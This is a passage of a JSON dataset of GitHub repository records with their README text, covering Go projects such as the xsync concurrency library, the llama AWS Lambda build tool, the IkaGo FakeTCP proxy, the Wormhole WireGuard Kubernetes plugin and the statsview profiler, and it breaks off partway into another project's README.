on overflow, provides causal FIFO, has blocking producers and consumers.\n\nThe idea of the algorithm is to allow parallelism for concurrent producers and consumers by introducing the notion of tickets, i.e. values of two counters, one per producers/consumers. An atomic increment of one of those counters is the only noticeable contention point in queue operations. The rest of the operation avoids contention on writes thanks to the turn-based read/write access for each of the queue items.\n\nIn essence, `MPMCQueue` is a specialized queue for scenarios where there are multiple concurrent producers and consumers of a single queue running on a large multicore machine.\n\nTo get the optimal performance, you may want to set the queue size to be large enough, say, an order of magnitude greater than the number of producers/consumers, to allow producers and consumers to progress with their queue operations in parallel most of the time.\n\n## RBMutex\n\nA `RBMutex` is a reader biased reader/writer mutual exclusion lock. The lock can be held by an many readers or a single writer.\n\n```go\nmu := xsync.NewRBMutex()\n// reader lock calls return a token\nt := mu.RLock()\n// the token must be later used to unlock the mutex\nmu.RUnlock(t)\n// writer locks are the same as in sync.RWMutex\nmu.Lock()\nmu.Unlock()\n```\n\n`RBMutex` is based on a modified version of BRAVO (Biased Locking for Reader-Writer Locks) algorithm: https://arxiv.org/pdf/1810.01553.pdf\n\nThe idea of the algorithm is to build on top of an existing reader-writer mutex and introduce a fast path for readers. On the fast path, reader lock attempts are sharded over an internal array based on the reader identity (a token in case of Golang). This means that readers do not contend over a single atomic counter like it's done in, say, `sync.RWMutex` allowing for better scalability in terms of cores.\n\nHence, by the design `RBMutex` is a specialized mutex for scenarios, such as caches, where the vast majority of locks are acquired by readers and write lock acquire attempts are infrequent. In such scenarios, `RBMutex` should perform better than the `sync.RWMutex` on large multicore machines.\n\n`RBMutex` extends `sync.RWMutex` internally and uses it as the \"reader bias disabled\" fallback, so the same semantics apply. The only noticeable difference is in the reader tokens returned from the `RLock`/`RUnlock` methods.\n\n## License\n\nLicensed under MIT.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nelhage/llama", "link": "https://github.com/nelhage/llama", "tags": [], "stars": 510, "description": null, "lang": "Go", "repo_lang": "", "readme": "# llama -- A CLI for outsourcing computation to AWS Lambda\n\nLlama is a tool for running UNIX commands inside of AWS Lambda. Its\ngoal is to make it easy to outsource compute-heavy tasks to Lambda,\nwith its enormous available parallelism, from your shell.\n\nMost notably, llama includes `llamacc`, a drop-in replacement for\n`gcc` or `clang` which executes the compilation in the cloud, allowing\nfor considerable speedups building large C or C++ software projects.\n\nLambda offers nearly-arbitrary parallelism and burst capacity for\ncompute, making it, in principle, well-suited as a backend for\ninteractive tasks that briefly require large amounts of compute. This\nidea has been explored in the [ExCamera][excamera] and [gg][gg]\npapers, but is not widely accessible at present.\n\n[excamera]: https://www.usenix.org/conference/nsdi17/technical-sessions/presentation/fouladi\n\n## Performance numbers\n\nHere are a few performance results from my testing demonstrating the\ncurrent speedups achievable from `llamacc`:\n\n|project|hardware|local build|local time|llamacc build|llamacc time|Approx llamacc cost|\n|-------|--------|-----------|----------|-------------|------------|-------------------|\n|Linux v5.10 defconfig|Desktop (24-thread Ryzen 9 3900)|`make -j30`|1:06|`make -j100`|0:42|$0.15|\n|Linux v5.10 defconfig|Simulated laptop (limited to 4 threads)|`make -j8`|4:56|`make -j100`|1:26|$0.15|\n|clang+LLVM, -O0|Desktop (24-thread Ryzen 9 3900)|`ninja -j30`|5:33|`ninja -j400`|1:24|$0.49|\n\nAs you can see, Llama is capable of speedups for large builds even on\nmy large, powerful desktop system, and the advantage is more\npronounced on smaller workstations.\n\n# Getting started\n\n## Dependencies\n\n- A Linux x86_64 machine. Llama only supports that platform for\n now. Cross-compilation should in theory be possible but is not\n implemented.\n- The [Go compiler](https://golang.org/dl/). Llama is tested on v1.16\n but older versions may work.\n- An [AWS account](https://aws.amazon.com/)\n\n### Install llama\n\nYou'll need to install Llama from source. You can run\n\n```\ngo install github.com/nelhage/llama/cmd/...@latest\n```\n\nor clone this repository and run\n```\ngo install ./...\n```\n\nIf you want to build C++, you'll want to symlink `llamac++` to point\nat `llamacc`:\n\n```\nln -nsf llamacc \"$(dirname $(which llamacc))/llamac++\"\n```\n\n### Set up your AWS credentials\n\nLlama needs access to your AWS credentials. You can provide them in\nthe environment via `AWS_ACCESS_KEY_ID`/`AWS_SECRET_ACCESS_KEY`, but\nthe recommended approach is to use [`~/.aws/credentials`][aws-creds],\nas used by. Llama will read keys out of either.\n\n[aws-creds]: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html\n\nThe account whose credentials you use must have sufficient permissions. The\nfollowing should suffice:\n\n* AmazonEC2ContainerRegistryFullAccess\n* AmazonS3FullAccess\n* AWSCloudFormationFullAccess\n* AWSLambdaFullAccess\n* IAMFullAccess\n\n### Configure llama's AWS resources\n\nLlama includes a [CloudFormation][cf] template and a command which\nuses it to bootstrap all required resources. You can [read the\ntemplate][template] to see what it's going to do.\n\n[cf]: https://aws.amazon.com/cloudformation/\n[template]: https://github.com/nelhage/llama/blob/master/cmd/llama/internal/bootstrap/template.json\n\nOnce your AWS credentials are ready, run\n\n```\n$ llama bootstrap\n```\n\nto create\nthe required AWS resources. By default, it will prompt you for an AWS\nregion to use; you can avoid the prompt using (e.g.) `llama -region\nus-west-2 bootstrap`.\n\nIf you get an error like\n```\nCreating cloudformation stack...\nStack created. Polling until completion...\nStack is in rollback: ROLLBACK_IN_PROGRESS. Something went wrong.\nStack status reason: The following resource(s) failed to create: [Repository, Bucket]. Rollback requested by user.\n```\n\nthen you can go to the AWS web console, and find the relevant CloudFormation\nstack. The event log should have more useful errors explaining what went\nwrong. You will then need to delete the stack before retrying the bootstrap.\n\n### Set up a GCC image\n\nYou'll need to build a container with an appropriate version of GCC for `llamacc` to use.\n\nIf you are running Debian or Ubuntu, you can use\n`scripts/build-gcc-image` to automatically build a Debian image and\nLambda function matching your local system:\n\n```console\n$ scripts/build-gcc-image\n```\n\nIf you want more control or are running another distribution, you can\nlook at `images/gcc-focal` for an example Dockerfile to build a\ncompiler package. You can build that or a similar image into a Lambda\nfunction using `llama update-function` like so:\n\n``` console\n$ llama update-function --create --build=images/gcc-focal gcc\n```\n\n## Using `llamacc`\n\nTo use `llamacc`, run a build using `make` or a similar build system\nwith a much higher `-j` concurrency than you normally would -- try\n5-10x the number of local cores,, and using `llamacc` or `llamac++` as\nyour compiler. For example, you might invoke\n\n``` console\n$ make -j100 CC=llamacc CXX=llamac++\n```\n\n## llamacc configuration\n\n`llamacc` takes a number of configuration options from the\nenvironment, so that they're easy to pass through your build\nsystem. The currently supported options include.\n\n|Variable|Meaning|\n|--------|-------|\n|`LLAMACC_VERBOSE`| Print commands executed by llamacc|\n|`LLAMACC_LOCAL` | Run the compilation locally. Useful for e.g. `CC=llamacc ./configure` |\n|`LLAMACC_REMOTE_ASSEMBLE`| Assemble `.S` or `.s` files remotely, as well as C/C++. |\n|`LLAMACC_FUNCTION`| Override the name of the lambda function for the compiler|\n|`LLAMACC_LOCAL_CC`| Specifies the C compiler to delegate to locally, instead of using 'cc' |\n|`LLAMACC_LOCAL_CXX`| Specifies the C++ compiler to delegate to locally, instead of using 'c++' |\n|`LLAMACC_LOCAL_PREPROCESS`| Run the preprocessor locally and send preprocessed source text to the cloud, instead of individual headers. Uses less total compute but much more bandwidth; this can easily saturate your uplink on large builds. |\n|`LLAMACC_FULL_PREPROCESS`| Run the full preprocessor locally, not just `#include` processing. Disables use of GCC-specific `-fdirectives-only`|\n|`LLAMACC_BUILD_ID`| Assigns an ID to the build. Used for Llama's internal tracing support. |\n|`LLAMACC_FILTER_WARNINGS`| Filters the given comma-separated list of warnings out of all the compilations, e.g. `LLAMACC_FILTER_WARNINGS=missing-include-dirs,packed-not-aligned`. |\n\nIt is strongly recommended that you use absolute paths if you set\n`LLAMACC_LOCAL_CC` and `LLAMACC_LOCAL_CXX`. Not all build systems will\npreserve `$PATH` all the way down to `llamacc`, so if you don't use\nabsolute paths, you can get build failures that are difficult to diagnose.\n\n# Other features\n\n## `llama invoke`\n\nYou can use `llama invoke` to execute individual commands inside of\nLambda. The syntax is `llama invoke \nargs...`. `` must be the name of a Lambda function using the\nLlama runtime. So, for instance, we can inspect the OS running inside\nour Lambda image:\n\n``` console\n$ llama invoke gcc uname -a\nLinux 169.254.248.253 4.14.225-175.364.amzn2.x86_64 #1 SMP Mon Mar 22 22:06:01 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux\n```\n\nIf your function consumes files as input or output, you can use the\n`-f` and `-o` options to specify that files should be passed between\nthe local and remote nodes. For instance:\n\n``` console\n$ llama invoke -f README.md:INPUT -o OUTPUT gcc sh -c 'sha256sum INPUT > OUTPUT'; cat OUTPUT\n16c399c108bb783fc5c4529df4fecd0decb81bc0707096ebd981ab2b669fae20 INPUT\n```\n\nNote the use of `LOCAL:REMOTE` syntax to optionally specify different\npaths between the local and remote ends.\n\n## `llama xargs`\n\n`llama xargs` provides an xargs-like interface for running commands in\nparallel in Lambda. Here's an example:\n\nThe [`optipng`](http://optipng.sourceforge.net/) command compresses\nPNG files and otherwise optimizes them to be as small as possible,\ntypically used in order to save bandwidth and speed load times on\nimage assets. `optipng` is somewhat computationally expensive and\ncompressing a large number of PNG files can be a slow operation. With\n`llama`, we can optimize a large of images by outsourcing the\ncomputation to lambda.\n\nI prepared a directory full of 151 PNG images of the original Pok\u00e9mon,\nand benchmarked how long it took to optimize them using 8 concurrent\nprocesses on my desktop:\n\n\n```console\n$ time ls -1 *.png | parallel -j 8 optipng {} -out optimized/{/}\n[...]\nreal 0m45.090s\nuser 5m33.745s\nsys 0m0.924s\n```\n\nOnce we've prepared and `optipng` lambda function (we'll talk about\nsetup in a later section), we can use `llama` to run the same\ncomputation in AWS Lambda:\n\n```console\n$ time ls -1 *.png | llama xargs -logs -j 151 optipng optipng '{{.I .Line}}' -out '{{.O (printf \"optimized/%s\" .Line)}}'\nreal 0m16.024s\nuser 0m2.013s\nsys 0m0.569s\n```\n\nWe use `llama xargs`, which works a bit like `xargs(1)`, but runs each\ninput line as a separate command in Lambda. It also uses the Go\ntemplate language to provide flexibility in substitutions, and offers\nthe special `.Input` and `.Output` methods (`.I` and `.O` for short)\nto mark files to be passed back and forth between the local\nenvironment and Lambda.\n\nLambda's CPUs are slower than my desktop and the network operations\nhave overhead, and so we don't see anywhere near a full `151/8`\nspeedup. However, the additional parallelism still nets us a 3x\nimprovement in real-time latency. Note also the vastly decreased\n`user` time, demonstrating that the CPU-intensive work has been\noffloaded, freeing up local compute resources for interactive\napplications or other use cases.\n\nThis operation consumed about 700 CPU-seconds in Lambda. I configured\n`optipng` to have 1792MB of memory, which is the point at which lambda\nallocates a full vCPU to the process. That comes out to about 1254400\nMB-seconds of usage, or about $0.017 assuming I'm already out of the\nLambda free tier.\n\n## Managing Llama functions\n\nThe llama runtime is designed to make it easy to bridge arbitrary\nimages into Lambda. You can look at `images/optipng/Dockerfile` in\nthis repository for a well-commented example explaining how you can\nwrap an arbitrary image inside of Lambda for use by Llama.\n\nOnce you have a Dockerfile or a Docker image, you can use `llama\nupdate-function` to upload it to ECR and manage the associated Lambda\nfunction. For instance, we could build optipng for the above example\nlike so:\n\n```console\n$ llama update-function --create --build=images/optipng optipng\n```\n\nWhen specifying the memory size for your functions, note that [Lambda\nassigns CPU resources to functions based on their memory\nallocation](https://docs.aws.amazon.com/lambda/latest/dg/configuration-memory.html). At\n1,769 MB, your function will have the equivalent of one full core.\n\n# Other notes\n\n## Inspiration\n\nLlama is in large part inspired by [`gg`][gg], a tool for outsourcing\nbuilds to Lambda. Llama is a much simpler tool but shares some of the\nsame ideas and is inspired by a very similar vision of using Lambda as\nhigh-concurrency burst computation for interactive uses.\n\n[gg]: https://github.com/StanfordSNR/gg\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zhxie/ikago", "link": "https://github.com/zhxie/ikago", "tags": [], "stars": 510, "description": "IkaGo is a proxy which helps bypassing UDP blocking, UDP QoS and NAT firewall written in Go.", "lang": "Go", "repo_lang": "", "readme": "# IkaGo\n\n**IkaGo** is a proxy which helps bypassing UDP blocking, UDP QoS and NAT firewall written in Go.\n\n*IkaGo is designed to accelerate games in game consoles.*\n\n*If you have a SOCKS5 proxy, use [pcap2socks](https://github.com/zhxie/pcap2socks) for better performance.*\n\n

\n \"an\n

\n

\n Pass the firewall like a squid : )\n

\n\n## Features\n\n

\n \"diagram\"\n

\n\n- **FakeTCP**: All TCP, UDP and ICMPv4 packets will be sent with a TCP header to bypass UDP blocking and UDP QoS. Inspired by [Udp2raw-tunnel](https://github.com/wangyu-/udp2raw-tunnel). The handshaking of TCP is also simulated.\n- **Proxy ARP**: Reply ARP request as it owns the specified address which is not on the network.\n- **Multiplexing and Multiple**: One client can handle multiple connections from different devices. And one server can serve multiple clients.\n- **Cross Platform**: Works well with Windows, macOS, Linux and others in theory.\n- **Monitor**: Observe traffic on [IkaGo-web](https://zhxie.github.io/ikago-web)\n- **Full Cone NAT**\n- **Encryption**\n- **KCP Support**\n\n## Dependencies\n\n1. [Npcap](http://www.npcap.org/) or WinPcap in Windows, libpcap in macOS, Linux and others.\n\n2. (Optional, recommended) pf in macOS, iptables and ethtool in Linux for automatic firewall rule addition.\n\n## Usage\n\n```\n# Client\ngo run ./cmd/ikago-client -r [sources] -s [ip:port]\n\n# Server\ngo run ./cmd/ikago-server -p [port]\n```\n\nExamples of configuration file are [here](/configs).\n\n### Common options\n\n`-list-devices`: (Optional, exclusive) List all valid devices in current computer.\n\n`-c path`: (Optional, exclusive) Configuration file. Examples of configuration file are [here](/configs). If IkaGo does not receive any arguments except `-v`, it will automatically read the configuration file `config.json` in the working directory if it exists.\n\n`-listen-devices devices`: (Optional) Devices for listening, use comma to separate multiple devices. If this value is not set, all valid devices excluding loopback devices will be used. For example, `-listen-devices eth0,wifi0,lo`.\n\n`-upstream-device device`: (Optional) Device for routing upstream to. If this value is not set, the first valid device with the same domain of gateway will be used.\n\n`-gateway address`: (Optional) Gateway address. If this value is not set, the first gateway address in the routing table will be used.\n\n`-mode mode`: (Optional) Mode, can be `faketcp`, `tcp`. Default as `tcp`. This option needs to be set consistently between the client and the server. You may have to configure your firewall by using `-rule` or follow the [troubleshoot](https://github.com/zhxie/ikago#troubleshoot) below in some modes.\n\n`-method method`: (Optional) Method of encryption, can be `plain`, `aes-128-gcm`, `aes-192-gcm`, `aes-256-gcm`, `chacha20-poly1305` or `xchacha20-poly1305`. Default as `plain`. This option needs to be set consistently between the client and the server. For more about encryption, please refer to the [development documentation](/dev.md).\n\n`-password password`: (Optional) Password of encryption, must be set only when method is not `plain`. This option needs to be set consistently between the client and the server.\n\n`-rule`: (Optional, recommended) Add firewall rule. In some OS, firewall rules need to be added to ensure the operation of IkaGo. Rules are described in [troubleshoot](https://github.com/zhxie/ikago#troubleshoot) below.\n\n`-monitor port`: (Optional) Port for monitoring. If this value is set, IkaGo will host HTTP server on `localhost:port` and print JSON statistics on it. You can observe observe traffic on [IkaGo-web](http://ikago.ikas.ink).\n\n`-v`: (Optional) Print verbose messages. Either `-v` or `verbose` in configuration file is set `true`, IkaGo will print verbose messages.\n\n`-log path`: (Optional) Log.\n\n#### FakeTCP options\n\n`-mtu size`: (Optional) MTU. MTU is set in traffic between the client and the server.\n\n`-kcp`: (Optional) Enable KCP. This option needs to be set consistently between the client and the server.\n\n`-kcp-mtu size`, `-kcp-sndwnd size`, `-kcp-rcvwnd size`, `-kcp-datashard size`, `-kcp-parityshard size`, `-kcp-acknodelay`: (Optional) KCP tuning options. These options need to be set consistently between the client and the server. Please refer to the [kcp-go](https://godoc.org/github.com/xtaci/kcp-go).\n\n`-kcp-nodelay`, `-kcp-interval size`, `kcp-resend size`, `kcp-nc size`: (Optional) KCP tuning options. These options need to be set consistently between the client and the server. Please refer to the [kcp](https://github.com/skywind3000/kcp/blob/master/README.en.md#protocol-configuration).\n\n### Client options\n\n`-publish addresses`: (Optional, recommended) ARP publishing address. If this value is set, IkaGo will reply ARP request as it owns the specified address which is not on the network, also called proxy ARP.\n\n`-fragment size`: (Optional) Fragmentation size for listening. If this value is set, packets sending from the client to sources will be fragmented by the given size.\n\n`-p port`: (Optional) Port for routing upstream. If this value is not set or set as `0`, a random port from 49152 to 65535 will be used.\n\n`-r addresses`: Sources, use comma to separate multiple addresses. Packets with the same source's address will be proxied.\n\n`-s address`: Server.\n\n### Server options\n\n`-fragment size`: (Optional) Fragmentation size for routing upstream. If this value is set, packets sending from the server to destinations will be fragmented by the given size.\n\n`-p port`: Port for listening.\n\n## Troubleshoot\n\n1. Because IkaGo use pcap to handle packets, it will not notify the OS if IkaGo is listening to any ports, all the connections are built manually. Some OS may operate with the packet in advance, while they have no information of the packet in there TCP stacks, and respond with a RST packet or even drop the packet. **You may configure iptables in Linux, pf in macOS and FreeBSD**, or Windows Firewall in Windows (You may not need to) with the following rules to solve the problem. **If you are using mode `tcp`, you may not need to configure the firewall, but you still have to disable IP forward.**\n ```\n // Linux\n // IkaGo-server\n sysctl -w net.ipv4.ip_forward=0\n iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP\n // IkaGo-client with proxy ARP and FakeTCP\n sysctl -w net.ipv4.ip_forward=0\n iptables -A OUTPUT -s server_ip/32 -p tcp --dport server_port -j DROP\n\n // macOS, FreeBSD\n // IkaGo-client with proxy ARP and FakeTCP\n sysctl -w net.inet.ip.forwarding=0\n echo \"block drop proto tcp from any to server_ip port server_port\" >> ./pf.conf\n pfctl -f ./pf.conf\n pfctl -e\n\n // Windows (You may not need to)\n // IkaGo-client with proxy ARP\n netsh advfirewall firewall add rule name=IkaGo-client protocol=TCP dir=in remoteip=server_ip/32 remoteport=server_port action=block\n netsh advfirewall firewall add rule name=IkaGo-client protocol=TCP dir=out remoteip=server_ip/32 remoteport=server_port action=block\n ```\n\n2. IkaGo prepend packets with TCP header, so an extra IPv4 and TCP header will be added to the packet. As a consequence, an extra 40 Bytes will be added to the total packet size. For encryption, extra bytes according to the method, up to 40 Bytes, and for KCP support, another 32 Bytes. IkaGo will fragment packets which are oversize, but excessive use in the packet header will cause a significant decrease in performance.\n\n3. IkaGo requires root permission in some OS by default. But you can run IkaGo with non-root running this command\n ```\n // Linux\n setcap cap_net_raw+ep path_to_ikago\n ```\n before opening IkaGo. If you run IkaGo with non-root, `-rule` will not work, please add firewall rules described in [troubleshoot](https://github.com/zhxie/ikago#troubleshoot) manually.\n\n4. IkaGo acts as a router and handles segments and fragments. Generic receive offload (GRO) enabled by default in some OS may increase network performance, but affect the normal operation of IkaGo because it breaks the end-to-end principle. You can disable GRO manually.\n ```\n // Linux\n sudo ethtool --offload network_interface_like_eth0 gro off\n ```\n\n## Limitations\n\n1. IPv6 is not supported because the dependency package [gopacket](https://github.com/google/gopacket) does not fully implement the serialization of the IPv6 extension header.\n\n## Known Issues\n\n1. When using mode TCP, sticky packets problems may occur in TCP connections. If encryption is enabled at the same time, IkaGo may not be able to destick these packets.\n\n2. Applications like VMWare Workstation on Windows may implement their own IP forwarding and forward packets that should be handled by IkaGo, resulting in abnormal operations in IkaGo.\n\n## Todo\n\n- [ ] Change sending packets to destinations procedures in IkaGo-server from pcap to standard connection\n- [ ] Build own application layer protocol to realize functions like delay detection\n- [ ] Discover the way handling packets concurrently to optimize performance\n\n## License\n\nIkaGo is licensed under [the MIT License](/LICENSE).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gravitational/wormhole", "link": "https://github.com/gravitational/wormhole", "tags": [], "stars": 510, "description": "Wireguard based overlay network CNI plugin for kubernetes", "lang": "Go", "repo_lang": "", "readme": "# Support Notice\n\n**The Wormhole project is no longer under active development.** \nThe project's development has been limited to maintenance and support for our\ncommercial customers until maintenance agreements expire.\n\nPlease see our blog post for more information:\nhttps://goteleport.com/blog/gravitational-is-teleport/\n\n# Gravitational Wormhole\nWormhole is a simple [CNI plugin](https://github.com/containernetworking/cni) designed to create an encrypted overlay network for [kubernetes](https://kubernetes.io) clusters.\n\n[WireGuard](https://www.wireguard.com) is a fascinating Fast, Modern, Secure VPN tunnel, that has been gaining significant praise from security experts, and is currently proposed for inclusion within the linux kernel.\n\nWormhole uses WireGuard to create a simple and secure high performance encrypted overlay network for kubernetes clusters, that is easy to manage and troubleshoot.\n\nWormhole does not implement network policy, instead we recommend to use [calico](https://github.com/projectcalico/calico) or [kube-router](https://github.com/cloudnativelabs/kube-router) as network policy controllers.\n\n## Notice\n\n\n\n## Getting Started\n\n### System Requirements\n1. [WireGuard](https://www.wireguard.com/install/) is installed on each node in you're cluster.\n2. A Kubernetes cluster with IPAM enabled (--pod-network-cidr= when using kubeadm based install)\n\n### Install (Kubeadm Cluster)\n```console\nkubectl apply -f https://raw.githubusercontent.com/gravitational/wormhole/master/docs/kube-wormhole.yaml\n```\n\nNote: The kubeadm cluster must be initialized with (--pod-network-cidr / --service-cidr) to enable IPAM\n\n### Install (Generic)\n```console\nkubectl apply -f https://raw.githubusercontent.com/gravitational/wormhole/master/docs/generic-wormhole.yaml\n```\n\nNote: Replace the --overlay-cidr flag in the daemonset with the overlay-cidr that matches you're network\nNote: Kubernetes IPAM must be enabled (--cluster-cidr / --allocate-node-cidrs on kube-controller-manager)\n\n## Troubleshooting\nSee [troubleshooting.md](docs/troubleshooting.md)\n\n## Build and Publish to a docker registry\n\n```\nWORM_REGISTRY_IMAGE=\"quay.io/gravitational/wormhole\" go run mage.go build:publish\n```\n\n## Test\n\n```\ngo run mage.go test:all\n```\n\n\n## More Information\n- [Wormhole RFC](docs/rfcs/0001-spec.md)\n\n## Contributing\nThe best way to contribute is to create issues or pull requests right here on Github. You can also reach the Gravitational team through their [website](https://gravitational.com)\n\n## Resources\n|Project Links| Description\n|---|----\n| [Blog](http://blog.gravitational.com) | Our blog, where we publish gravitational news |\n| [Security and Release Updates](https://community.gravitational.com/c/wormhole-news) | Subscribe to our discourse for security and news updates |\n| [Community Forum](https://community.gravitational.com/c/wormhole) | Gravitational Community Forum|\n\n## Who Built Wormhole?\nWormhole was created by [Gravitational Inc.](https://gravitational.com) We have built wormhole by leveraging our experience automating and supporting hundreds of kubernetes clusters with [Gravity](https://gravitational.com/gravity/), our Kubernetes distribution optimized for deploying and remotely controlling complex applications into multiple environments at the same time:\n\n- Multiple cloud regions\n- Colocation\n- Private enterprise clouds located behind firewalls\n", "readme_type": "markdown", "hn_comments": "Just afraid that time will come, when searching for black hole, neutrinos, gravity will primarily yield these kinds of topics. Not actual ones.Doesn't Istio provide inter-pod encryption, or am I totally off the reservation here?We were recently discussing creating something like for this, the current set of CNI options is wide but shallow. As mentioned in the article CNI is something you want to be as simple as possible, we\u2019ve had trouble with weave and all it\u2019s complexity. Flannel plus encryption is perfect!Big warning to readers:If Gravitational asks you to complete an 'engineering challenge' they are using you for free labour.See: https://news.ycombinator.com/item?id=19784787I thought I understood this, and that it replaced (and no doubt did a better job of) what I'd already done - WG to get nodes on the same network, CNI on top.But requirement 2 confused me:\n> A Kubernetes cluster with IPAM enabled (--pod-network-cidr= when using kubeadm based install)So, do node machines need to already be on the same network or not?> If you\u2019re running Kubernetes in a network you don\u2019t fully trust or need to encrypt all pod network traffic between hosts for legacy applications or compliance reasons, Wormhole might be for youIs there a good analysis somewhere about how typical kubernetes setups trust the network and what badness an advesary could do with kubernetes network access? How sound is this default deployment setup from security POV?For example I think DNS is used internally for service discovery, and incoming TLS is often terminated and proxied onwards as HTTP - those could be both MITMed, right?Very cool to see WireGuard being used in a mesh implementation. This reminds me of Weave[0] which has worked well for me. I'll definitely be experimenting with Wormhole.[0] https://www.weave.works/oss/net/Author here. Feel free to reach out if you have questions or thoughts about the project.Should've named it Wrmhole so it's appropriately 21st century. Dropping vowels is all the rage.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "go-echarts/statsview", "link": "https://github.com/go-echarts/statsview", "tags": [], "stars": 510, "description": "\ud83d\ude80 A real-time Golang runtime stats visualization profiler", "lang": "Go", "repo_lang": "", "readme": "# \ud83d\ude80 Statsview\n\nStatsview is a real-time Golang runtime stats visualization profiler. It is built top on another open-source project, [go-echarts](https://github.com/go-echarts/go-echarts), which helps statsview to show its graphs on the browser.\n\n\n \"Contributions\n\n\n \"Go\n\n\n \"MIT\n\n\n \"GoDoc\"\n \n\n## \ud83d\udd30 Installation\n\n```shell\n$ go get -u github.com/go-echarts/statsview/...\n```\n\n## \ud83d\udcdd Usage\n\nStatsview is quite simple to use and all static assets have been packaged into the project which makes it possible to run offline. It's worth pointing out that statsview has integrated the standard `net/http/pprof` hence statsview will be the only profiler you need.\n\n```golang\npackage main\n\nimport (\n \"time\"\n\n \"github.com/go-echarts/statsview\"\n)\n\nfunc main() {\n\tmgr := statsview.New()\n\n\t// Start() runs a HTTP server at `localhost:18066` by default.\n\tgo mgr.Start()\n\n\t// Stop() will shutdown the http server gracefully\n\t// mgr.Stop()\n\n\t// busy working....\n\ttime.Sleep(time.Minute)\n}\n\n// Visit your browser at http://localhost:18066/debug/statsview\n// Or debug as always via http://localhost:18066/debug/pprof, http://localhost:18066/debug/pprof/heap, ...\n```\n\n## \u2699\ufe0f Configuration\n\nStatsview gets a variety of configurations for the users. Everyone could customize their favorite charts style.\n\n```golang\n// WithInterval sets the interval(in Millisecond) of collecting and pulling metrics\n// default -> 2000\nWithInterval(interval int)\n\n// WithMaxPoints sets the maximum points of each chart series\n// default -> 30\nWithMaxPoints(n int)\n\n// WithTemplate sets the rendered template which fetching stats from the server and\n// handling the metrics data\nWithTemplate(t string)\n\n// WithAddr sets the listening address and link address\n// default -> \"localhost:18066\"\nWithAddr(addr string)\n\n// WithLinkAddr sets the html link address\n// default -> \"localhost:18066\"\nWithLinkAddr(addr string)\n\n// WithTimeFormat sets the time format for the line-chart Y-axis label\n// default -> \"15:04:05\"\nWithTimeFormat(s string)\n\n// WithTheme sets the theme of the charts\n// default -> Macarons\n//\n// Optional:\n// * ThemeWesteros\n// * ThemeMacarons\nWithTheme(theme Theme)\n```\n\n#### Set the options\n\n```golang\nimport (\n \"github.com/go-echarts/statsview\"\n \"github.com/go-echarts/statsview/viewer\"\n)\n\n// set configurations before calling `statsview.New()` method\nviewer.SetConfiguration(viewer.WithTheme(viewer.ThemeWesteros), viewer.WithAddr(\"localhost:8087\"))\n\nmgr := statsview.New()\ngo mgr.Start()\n```\n\n## \ud83d\uddc2 Viewers\n\nViewer is the abstraction of a Graph which in charge of collecting metrics from Runtime. Statsview provides some default viewers as below.\n\n* `GCCPUFractionViewer`\n* `GCNumViewer`\n* `GCSizeViewer`\n* `GoroutinesViewer`\n* `HeapViewer`\n* `StackViewer`\n\nViewer wraps a go-echarts [*charts.Line](https://github.com/go-echarts/go-echarts/blob/master/charts/line.go) instance that means all options/features on it could be used. To be honest, I think that is the most charming thing about this project.\n\n## \ud83d\udd16 Snapshot\n\n#### ThemeMacarons(default)\n\n![Macarons](https://user-images.githubusercontent.com/19553554/99491359-92d9f680-29a6-11eb-99c8-bc333cb90893.png)\n\n#### ThemeWesteros\n\n![Westeros](https://user-images.githubusercontent.com/19553554/99491179-42629900-29a6-11eb-852b-694662fcd3aa.png)\n\n## \ud83d\udcc4 License\n\nMIT [\u00a9chenjiandongx](https://github.com/chenjiandongx)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "it234/goapp", "link": "https://github.com/it234/goapp", "tags": [], "stars": 510, "description": "Gin + GORM + Casbin + vue-element-admin \u5b9e\u73b0\u7684\u6743\u9650\u7ba1\u7406\u7cfb\u7edf(golang)", "lang": "Go", "repo_lang": "", "readme": "

GOAPP

\n\n
\n \u57fa\u4e8e Gin + GORM + Casbin + vue-element-admin \u5b9e\u73b0\u7684\u6743\u9650\u7ba1\u7406\u7cfb\u7edf
\n \u57fa\u4e8eCasbin \u5b9e\u73b0RBAC\u6743\u9650\u7ba1\u7406
\n \u524d\u7aef\u5b9e\u73b0\uff1a vue-element-admin
\n \u5728\u7ebf\u4f53\u9a8c\uff1ahttp://35.241.100.145:5315
\n
\n
\n\n## \u7279\u6027\n\n- \u57fa\u4e8e Casbin \u7684 RBAC \u8bbf\u95ee\u63a7\u5236\u6a21\u578b\n- JWT \u8ba4\u8bc1\n- \u524d\u540e\u7aef\u5206\u79bb\n\n## \u4e0b\u8f7d\u5e76\u8fd0\u884c\n\n### \u83b7\u53d6\u4ee3\u7801\n\n```\ngo get -v github.com/it234/goapp\n```\n\n### \u8fd0\u884c\n\n- \u53ef\u4ee5\u76f4\u63a5\u4e0b\u8f7d\u6253\u5305\u597d\u7684\u684c\u9762\u5ba2\u6237\u7aef\u4f53\u9a8c\uff0c\u4e0b\u8f7d\u5730\u5740: https://pan.baidu.com/s/1wDsHH-KMQHV5tMRUv50Q3w \u63d0\u53d6\u7801: 9u2d \n- \u8fd0\u884c\u670d\u52a1\u7aef\uff1acd cmd/manageweb\uff0cgo run main.go\uff0c\u8fd0\u884c\u6210\u529f\u540e\u6253\u5f00 127.0.0.1:8080\uff0c\u5982\u679c\u662f\u5728windows\u4e0b\u64cd\u4f5c\uff0c\u9700\u8981\u63d0\u524d\u5b89\u88c5\u5e76\u914d\u7f6e\u597dmingw\uff08sqlite\u7684\u64cd\u4f5c\u5e93\u7528\u5230\uff09\uff0c\u5b89\u88c5\u65b9\u5f0f\u8bf7\u81ea\u884c\u767e\u5ea6/\u8c37\u6b4c\u3002\n- \u8c03\u8bd5/\u8fd0\u884cweb\uff1acd website/manageweb\uff0c\u5b89\u88c5\uff1anpm install\uff0c\u8fd0\u884c\uff1anpm run dev\uff0c\u6253\u5305\uff1anpm run build:prod\n- 